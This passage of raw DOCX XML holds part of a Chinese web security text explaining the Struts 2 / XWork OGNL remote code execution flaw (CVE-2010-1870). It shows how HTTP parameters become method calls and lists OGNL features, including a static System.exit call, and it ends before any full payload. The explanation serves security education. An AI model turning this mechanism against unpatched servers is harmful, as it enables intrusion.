        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>前面几节讲的都是在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>框架中实现安全方案，但 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>框架本身也可能会出现漏洞，只</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>要是程序，就可能出现 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。但是开发框架由于其本身的特殊性，一般网站出于稳定的考虑不</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>会对这个基础设施频繁升级，因此开发框架的漏洞可能不会得到及时的修补，但由此引发的后果却会很严重。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="292" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="144"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>下面讲到的几个漏洞，都是一些流行的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>开发框架曾经出现过的严重漏洞。研究这些案</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>例，可以帮助我们更好地理解框架安全，在使用开发框架时更加的小心，同时让我们不要迷信于开发框架的权威。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1201" w:val="left" w:leader="none"/>
          <w:tab w:pos="1202" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1201" w:right="0" w:hanging="998"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="130"/>
        </w:rPr>
        <w:t>Struts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:w w:val="130"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="130"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:w w:val="130"/>
        </w:rPr>
        <w:t> 命令执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="200"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>201</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-50"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>日，安全研究者公布了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-48"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>一个远程执行代码的漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>201</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>0-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>1870</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-101"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>严格来说，这其实是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>XWork</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>的漏洞，因为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Struts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>的核心使用的是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>WebWork</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
        </w:rPr>
        <w:t>，而 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>WebWork</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>又</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>是使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>XWork</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>来处理 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>action</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="446" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="604" w:right="4289" w:hanging="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>这个漏洞的细节描述公布在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>exploit-db</w:t>
      </w:r>
      <w:hyperlink w:history="true" w:anchor="_bookmark13">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>上。在这里简单摘述如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XWork </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>getters/setters </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>方法从 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的参数中获取对应 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>action </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的名称，这个过程是基于</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>OGNL(Object Graph Navigation Language)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>OGNL </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>是怎么处理的呢？如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="8396" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="165"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>user.address.city=Bishkek&amp;user['favoriteDrink']=kumys</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="72"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>会被转化成：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:6.300801pt;width:411.15pt;height:20.05pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4552;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="266" w:lineRule="auto" w:before="8"/>
                    <w:ind w:left="28" w:right="3566" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>action.getUser().getAddress().setCity("Bishkek") action.getUser().setFavoriteDrink("kumys")</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="78"/>
        <w:ind w:left="203" w:right="149" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:39.099991pt;width:411.15pt;height:50.05pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4576;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="33"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:pos="221" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="220" w:right="0" w:hanging="192"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>Method calling:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-3"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>foo()</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="33"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:pos="221" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="220" w:right="0" w:hanging="192"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>Static method calling:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-5"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>@java.lang.System@exit(1)</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="33"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:pos="221" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="220" w:right="0" w:hanging="192"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>Constructor calling: new</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-4"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>MyClass()</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="33"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:pos="221" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="220" w:right="0" w:hanging="192"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>Ability to work with context variables: #foo = new</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-14"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>MyClass()</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="33"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:pos="221" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="220" w:right="0" w:hanging="192"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>And</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-2"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>more...</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>这个过程是由 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ParametersInterceptor </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ValueStack.setValue()</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>完成的，它的参数是用户可控的，由 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>参数传入。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>OGNL </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的功能较为强大，远程执行代码也正是利用了它的功能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="78"/>
        <w:ind w:left="203" w:right="223" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:39.099991pt;width:411.15pt;height:19.95pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4600;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="34"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:pos="221" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:line="185" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="220" w:right="0" w:hanging="192"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>OgnlContext's</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:spacing w:val="-5"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>property</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:spacing w:val="-5"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>'xwork.MethodAccessor.denyMethodExecution</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:spacing w:val="-2"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>' (</w:t>
